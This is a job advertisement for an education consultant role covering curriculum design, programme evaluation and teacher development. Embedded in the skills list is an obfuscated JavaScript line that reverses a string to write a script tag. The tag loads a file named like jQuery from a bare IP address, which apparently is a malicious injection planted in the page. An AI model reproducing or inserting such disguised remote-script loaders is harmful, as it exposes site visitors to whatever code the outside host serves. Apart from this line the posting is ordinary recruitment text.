Industry : Education
Terms : 2 year contract (renewable based on performance & availability)
• Ability to conceptualize and develop conceptual and theoretical frameworks for sustainable education reforms and transformation within the following scope:
– Project Design & Architecture
– Curriculum & Instructional design
– Programme Intervention and Evaluation
• Ability to develop, conceptualize and plan instructional methodologies to reinvent/transform/improve the Teaching & Learning process.
• Ability to outline the concepts for education programmes and interventions, defining (needs for) the programme medium, content, standards, assessments, accompanying materials, and complementary learning approaches.
• A Master’s degree and/or PhD in Education or other relevant fields
• Relevant working experience in the education sector i.e. Curriculum and Instructional Design, Education Policy & Planning, Teacher Development, Educational Leadership
• Ability to write education reports
• Fully computer literate with Microsoft Office programmes
• Good command of oral and written English
• Good interpersonal skills document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to firstname.lastname@example.org